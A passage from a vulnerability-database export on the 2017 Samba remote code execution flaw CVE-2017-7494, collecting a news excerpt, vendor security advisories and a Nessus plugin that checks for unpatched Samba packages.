Samba is predominantly run on Linux and Unix machines, however, making them the biggest target here.\n\nResearchers with Rapid7 [said last week](<https://community.rapid7.com/community/infosec/blog/2017/05/25/patching-cve-2017-7494-in-samba-it-s-the-circle-of-life>) that they saw more than 104,000 internet-exposed endpoints running vulnerable versions of Samba on port 445 and approximately 110,000 endpoints on port 139. According to the company, 91 percent of the port 139 endpoints were running older, unsupported versions of Samba, something that could make resolving the vulnerability tricky.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/05/06224521/Screen-Shot-2017-05-31-at-12.34.32-PM.png>)\n\nSince Samba\u2019s patch is only for versions 4.4 and up, users running older versions, 3.5x to 4.4x, need to update to a supported version of the software in order to apply the patch.\n\nThe bug is seemingly the biggest to surface in Samba since last year\u2019s Badlock vulnerability. That bug, [hyped for weeks](<https://threatpost.com/badlock-vulnerability-clues-few-and-far-between/117008/>), [ultimately fell short of expectations](<https://threatpost.com/badlock-vulnerability-falls-flat-against-its-hype/117349/>). 
Instead of allowing code execution\u2014like last week\u2019s bug, Badlock was merely a combination man-in-the-middle and denial-of-service bug that allowed attackers to elevate privileges or crash a Windows machine running Samba.\n", "modified": "2017-06-05T15:19:35", "published": "2017-05-31T13:51:56", "id": "THREATPOST:B108BD1ECF3200F21B65BFC1C849F747", "href": "https://threatpost.com/cisco-netgear-readying-patches-for-samba-vulnerability/125974/", "type": "threatpost", "title": "Cisco, Netgear Readying Patches for Samba Vulnerability", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2020-07-02T11:34:02", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7494"], "description": "USN-3296-1 fixed a vulnerability in Samba. This update provides the \ncorresponding update for Ubuntu 12.04 ESM.\n\nOriginal advisory details:\n\nIt was discovered that Samba incorrectly handled shared libraries. A remote \nattacker could use this flaw to upload a shared library to a writable share \nand execute arbitrary code.", "edition": 6, "modified": "2017-05-24T00:00:00", "published": "2017-05-24T00:00:00", "id": "USN-3296-2", "href": "https://ubuntu.com/security/notices/USN-3296-2", "title": "Samba vulnerability", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:41:07", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7494"], "description": "It was discovered that Samba incorrectly handled shared libraries. 
A remote \nattacker could use this flaw to upload a shared library to a writable share \nand execute arbitrary code.", "edition": 5, "modified": "2017-05-24T00:00:00", "published": "2017-05-24T00:00:00", "id": "USN-3296-1", "href": "https://ubuntu.com/security/notices/USN-3296-1", "title": "Samba vulnerability", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:45:10", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7494"], "description": "Samba is an open-source implementation of the Server Message Block (SMB) protocol and the related Common Internet File System (CIFS) protocol, which allow PC-compatible machines to share files, printers, and various information.\n\nSecurity Fix(es):\n\n* A remote code execution flaw was found in Samba. A malicious authenticated samba client, having write access to the samba share, could use this flaw to execute arbitrary code as root. (CVE-2017-7494)\n\nRed Hat would like to thank the Samba project for reporting this issue. Upstream acknowledges steelo as the original reporter.", "modified": "2018-06-07T02:43:01", "published": "2017-05-24T11:27:07", "id": "RHSA-2017:1273", "href": "https://access.redhat.com/errata/RHSA-2017:1273", "type": "redhat", "title": "(RHSA-2017:1273) Important: samba security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:20", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7494"], "description": "Samba is an open-source implementation of the Server Message Block (SMB) protocol and the related Common Internet File System (CIFS) protocol, which allow PC-compatible machines to share files, printers, and various information.\n\nSecurity Fix(es):\n\n* A remote code execution flaw was found in Samba. A malicious authenticated samba client, having write access to the samba share, could use this flaw to execute arbitrary code as root. 
(CVE-2017-7494)\n\nRed Hat would like to thank the Samba project for reporting this issue. Upstream acknowledges steelo as the original reporter.", "modified": "2017-08-28T06:44:20", "published": "2017-06-05T09:47:14", "id": "RHSA-2017:1390", "href": "https://access.redhat.com/errata/RHSA-2017:1390", "type": "redhat", "title": "(RHSA-2017:1390) Important: samba security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:26", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7494"], "description": "Samba is an open-source implementation of the Server Message Block (SMB) or Common Internet File System (CIFS) protocol, which allows PC-compatible machines to share files, printers, and other information.\n\nSecurity Fix(es):\n\n* A remote code execution flaw was found in Samba. A malicious authenticated samba client, having write access to the samba share, could use this flaw to execute arbitrary code as root. (CVE-2017-7494)\n\nRed Hat would like to thank the Samba project for reporting this issue. Upstream acknowledges steelo as the original reporter.", "modified": "2018-06-07T18:22:55", "published": "2017-05-24T11:26:37", "id": "RHSA-2017:1271", "href": "https://access.redhat.com/errata/RHSA-2017:1271", "type": "redhat", "title": "(RHSA-2017:1271) Important: samba4 security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:33", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7494"], "description": "Samba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible machines\nto share files, printers, and other information.\n\nSecurity Fix(es):\n\n* A remote code execution flaw was found in Samba. A malicious authenticated\nsamba client, having write access to the samba share, could use this flaw to\nexecute arbitrary code as root. 
(CVE-2017-7494)\n\nRed Hat would like to thank the Samba project for reporting this issue. Upstream\nacknowledges steelo as the original reporter.\n", "modified": "2017-09-08T11:59:30", "published": "2017-05-24T04:00:00", "id": "RHSA-2017:1272", "href": "https://access.redhat.com/errata/RHSA-2017:1272", "type": "redhat", "title": "(RHSA-2017:1272) Important: samba3x security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2020-12-08T03:34:18", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7494"], "description": "**CentOS Errata and Security Advisory** CESA-2017:1270\n\n\nSamba is an open-source implementation of the Server Message Block (SMB) protocol and the related Common Internet File System (CIFS) protocol, which allow PC-compatible machines to share files, printers, and various information.\n\nSecurity Fix(es):\n\n* A remote code execution flaw was found in Samba. A malicious authenticated samba client, having write access to the samba share, could use this flaw to execute arbitrary code as root. (CVE-2017-7494)\n\nRed Hat would like to thank the Samba project for reporting this issue. 
Upstream acknowledges steelo as the original reporter.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2017-May/034457.html\nhttp://lists.centos.org/pipermail/centos-announce/2017-May/034458.html\n\n**Affected packages:**\nctdb\nctdb-tests\nlibsmbclient\nlibsmbclient-devel\nlibwbclient\nlibwbclient-devel\nsamba\nsamba-client\nsamba-client-libs\nsamba-common\nsamba-common-libs\nsamba-common-tools\nsamba-dc\nsamba-dc-libs\nsamba-devel\nsamba-doc\nsamba-domainjoin-gui\nsamba-glusterfs\nsamba-krb5-printing\nsamba-libs\nsamba-pidl\nsamba-python\nsamba-swat\nsamba-test\nsamba-test-libs\nsamba-vfs-glusterfs\nsamba-winbind\nsamba-winbind-clients\nsamba-winbind-devel\nsamba-winbind-krb5-locator\nsamba-winbind-modules\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2017-1270.html", "edition": 4, "modified": "2017-05-25T14:37:25", "published": "2017-05-25T13:08:37", "href": "http://lists.centos.org/pipermail/centos-announce/2017-May/034457.html", "id": "CESA-2017:1270", "title": "ctdb, libsmbclient, libwbclient, samba security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-08T03:38:00", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7494"], "description": "**CentOS Errata and Security Advisory** CESA-2017:1271\n\n\nSamba is an open-source implementation of the Server Message Block (SMB) or Common Internet File System (CIFS) protocol, which allows PC-compatible machines to share files, printers, and other information.\n\nSecurity Fix(es):\n\n* A remote code execution flaw was found in Samba. A malicious authenticated samba client, having write access to the samba share, could use this flaw to execute arbitrary code as root. (CVE-2017-7494)\n\nRed Hat would like to thank the Samba project for reporting this issue. 
Upstream acknowledges steelo as the original reporter.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2017-May/034456.html\n\n**Affected packages:**\nsamba4\nsamba4-client\nsamba4-common\nsamba4-dc\nsamba4-dc-libs\nsamba4-devel\nsamba4-libs\nsamba4-pidl\nsamba4-python\nsamba4-test\nsamba4-winbind\nsamba4-winbind-clients\nsamba4-winbind-krb5-locator\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2017-1271.html", "edition": 4, "modified": "2017-05-25T13:07:15", "published": "2017-05-25T13:07:15", "href": "http://lists.centos.org/pipermail/centos-announce/2017-May/034456.html", "id": "CESA-2017:1271", "title": "samba4 security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "huawei": [{"lastseen": "2019-02-01T18:01:51", "bulletinFamily": "software", "cvelist": ["CVE-2017-7494"], "description": "Products\n\nSwitches\nRouters\nWLAN\nServers\nSee All\n\n\n\nSolutions\n\nCloud Data Center\nEnterprise Networking\nWireless Private Network\nSolutions by Industry\nSee All\n\n\n\nServices\n\nTraining and Certification\nICT Lifecycle Services\nTechnology Services\nIndustry Solution Services\nSee All\n\n\n\nSee all offerings at e.huawei.com\n\n\n\nNeed Support ?\n\nProduct Support\nSoftware Download\nCommunity\nTools\n\nGo to Full Support", "edition": 1, "modified": "2017-11-29T00:00:00", "published": "2017-11-29T00:00:00", "id": "HUAWEI-SA-20171129-01-SAMBA", "href": "https://www.huawei.com/en/psirt/security-advisories/2017/huawei-sa-20171129-01-samba-en", "title": "Security Advisory - Samba Remote Code Execution Vulnerability in Some Huawei Products", "type": "huawei", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-29T13:11:52", "bulletinFamily": "software", "cvelist": ["CVE-2017-7494"], "description": "All versions of Samba from 3.5.0 onwards are vulnerable to a remote code execution 
vulnerability, allowing an authenticated attacker to upload a shared library to a writable share and execute arbitrary code remotely on a targeted system. Samba 4.6.4, 4.5.10 and 4.4.14 have been issued as security releases to correct the defect. (Vulnerability ID: HWPSIRT-2017-05176)\nThis vulnerability has been assigned a CVE ID: CVE-2017-7494.\nHuawei has released software updates to fix this vulnerability. This advisory is available at the following link:\nhttp://www.huawei.com/en/psirt/security-advisories/huawei-sa-20170613-01-samba-en", "edition": 1, "modified": "2017-11-29T00:00:00", "published": "2017-06-13T00:00:00", "href": "http://www.huawei.com/en/psirt/security-advisories/2017/huawei-sa-20170613-01-samba-en", "id": "HUAWEI-SA-20170613-01-SAMBA", "type": "huawei", "title": "Security Advisory - Samba Remote Code Execution Vulnerability in Some Huawei Products", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2017-05-25T17:47:35", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7494"], "description": "This update for samba fixes the following issue:\n\n - An unprivileged user with access to the samba server could cause smbd to\n load a specially crafted shared library, which then had the ability to\n execute arbitrary code on the server as 'root'. 
[CVE-2017-7494,\n bso#12780, bsc#1038231]\n\n", "edition": 1, "modified": "2017-05-24T15:10:25", "published": "2017-05-24T15:10:25", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-05/msg00065.html", "id": "SUSE-SU-2017:1393-1", "title": "Security update for samba (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-05-25T17:47:36", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7494"], "description": "This update for samba fixes the following issue:\n\n - An unprivileged user with access to the samba server could cause smbd to\n load a specially crafted shared library, which then had the ability to\n execute arbitrary code on the server as 'root'. [CVE-2017-7494,\n bso#12780, bsc#1038231]\n\n", "edition": 1, "modified": "2017-05-24T15:09:27", "published": "2017-05-24T15:09:27", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-05/msg00064.html", "id": "SUSE-SU-2017:1391-1", "title": "Security update for samba (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-05-26T17:45:59", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7494"], "description": "This update for samba fixes the following issue:\n\n - An unprivileged user with access to the samba server could cause smbd to\n load a specially crafted shared library, which then had the ability to\n execute arbitrary code on the server as 'root'. 
[CVE-2017-7494,\n bso#12780, bsc#1038231]\n\n This update was imported from SUSE:SLE-12-SP1:Update project.\n\n NOTE: This update is released in openSUSE Leap 42.1 after its official End\n Of Life only because\n of its severity and potential impact for users that have not migrated yet.\n\n Please upgrade your openSUSE Leap 42.1 as soon as possible.\n\n", "edition": 1, "modified": "2017-05-26T18:09:30", "published": "2017-05-26T18:09:30", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-05/msg00072.html", "id": "OPENSUSE-SU-2017:1415-1", "title": "Security update for samba (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-05-25T17:47:35", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7494"], "description": "This update for samba fixes the following issue:\n\n - An unprivileged user with access to the samba server could cause smbd to\n load a specially crafted shared library, which then had the ability to\n execute arbitrary code on the server as 'root'. [CVE-2017-7494,\n bso#12780, bsc#1038231]\n\n", "edition": 1, "modified": "2017-05-24T15:09:57", "published": "2017-05-24T15:09:57", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-05/msg00066.html", "id": "SUSE-SU-2017:1392-1", "title": "Security update for samba (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-05-25T17:47:35", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7494"], "description": "This update for samba fixes the following issue:\n\n - An unprivileged user with access to the samba server could cause smbd to\n load a specially crafted shared library, which then had the ability to\n execute arbitrary code on the server as 'root'. 
[CVE-2017-7494,\n bso#12780, bsc#1038231]\n\n This update was imported from the SUSE:SLE-12-SP2:Update update project.\n\n", "edition": 1, "modified": "2017-05-24T21:12:15", "published": "2017-05-24T21:12:15", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-05/msg00069.html", "id": "OPENSUSE-SU-2017:1401-1", "title": "Security update for samba (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2021-01-17T13:49:48", "description": "Security Fix(es) :\n\n - A remote code execution flaw was found in Samba. A\n malicious authenticated samba client, having write\n access to the samba share, could use this flaw to\n execute arbitrary code as root. (CVE-2017-7494)", "edition": 24, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-25T00:00:00", "title": "Scientific Linux Security Update : samba on SL6.x, SL7.x i386/x86_64 (20170524) (SambaCry)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7494"], "modified": "2017-05-25T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:samba-client-libs", "p-cpe:/a:fermilab:scientific_linux:samba-domainjoin-gui", "p-cpe:/a:fermilab:scientific_linux:samba-devel", "p-cpe:/a:fermilab:scientific_linux:samba-libs", "p-cpe:/a:fermilab:scientific_linux:samba-test", "p-cpe:/a:fermilab:scientific_linux:samba-krb5-printing", "p-cpe:/a:fermilab:scientific_linux:samba-winbind-krb5-locator", "p-cpe:/a:fermilab:scientific_linux:samba-winbind-devel", "p-cpe:/a:fermilab:scientific_linux:libsmbclient-devel", "p-cpe:/a:fermilab:scientific_linux:samba-test-libs", "p-cpe:/a:fermilab:scientific_linux:samba-common", "p-cpe:/a:fermilab:scientific_linux:samba-winbind-modules", "p-cpe:/a:fermilab:scientific_linux:samba-dc-libs", "p-cpe:/a:fermilab:scientific_linux:samba-python", "p-cpe:/a:fermilab:scientific_linux:samba-pidl", "p-cpe:/a:fermilab:scientific_linux:samba-client", 
"p-cpe:/a:fermilab:scientific_linux:samba-swat", "p-cpe:/a:fermilab:scientific_linux:samba-vfs-glusterfs", "p-cpe:/a:fermilab:scientific_linux:samba-winbind", "p-cpe:/a:fermilab:scientific_linux:samba-winbind-clients", "p-cpe:/a:fermilab:scientific_linux:samba-glusterfs", "p-cpe:/a:fermilab:scientific_linux:libwbclient-devel", "p-cpe:/a:fermilab:scientific_linux:samba-dc", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:samba-debuginfo", "p-cpe:/a:fermilab:scientific_linux:libsmbclient", "p-cpe:/a:fermilab:scientific_linux:libwbclient", "p-cpe:/a:fermilab:scientific_linux:samba", "p-cpe:/a:fermilab:scientific_linux:samba-doc", "p-cpe:/a:fermilab:scientific_linux:samba-common-tools", "p-cpe:/a:fermilab:scientific_linux:samba-common-libs"], "id": "SL_20170524_SAMBA_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/100403", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100403);\n script_version(\"3.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2017-7494\");\n\n script_name(english:\"Scientific Linux Security Update : samba on SL6.x, SL7.x i386/x86_64 (20170524) (SambaCry)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\n - A remote code execution flaw was found in Samba. A\n malicious authenticated samba client, having write\n access to the samba share, could use this flaw to\n execute arbitrary code as root. 
(CVE-2017-7494)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1705&L=scientific-linux-errata&F=&S=&P=7563\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?528384a6\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba is_known_pipename() Arbitrary Module Load');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libsmbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libwbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libwbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-client-libs\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-common-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-common-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-dc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-dc-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-domainjoin-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-glusterfs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-krb5-printing\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-pidl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-test-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-vfs-glusterfs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-winbind\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-winbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-winbind-krb5-locator\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-winbind-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/25\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"libsmbclient-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"libsmbclient-devel-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-client-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-common-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-debuginfo-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-doc-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-domainjoin-gui-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"SL6\", cpu:\"x86_64\", reference:\"samba-glusterfs-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-swat-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-winbind-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-winbind-clients-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-winbind-devel-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-winbind-krb5-locator-3.6.23-43.el6_9\")) flag++;\n\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libsmbclient-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libsmbclient-devel-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libwbclient-4.4.4-14.el7_3\")) flag++;\nif 
(rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libwbclient-devel-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-client-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-client-libs-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"samba-common-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-common-libs-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-common-tools-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-dc-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-dc-libs-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-debuginfo-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-devel-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-krb5-printing-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-libs-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"samba-pidl-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-python-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-test-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-test-libs-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-vfs-glusterfs-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-winbind-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-winbind-clients-4.4.4-14.el7_3\")) 
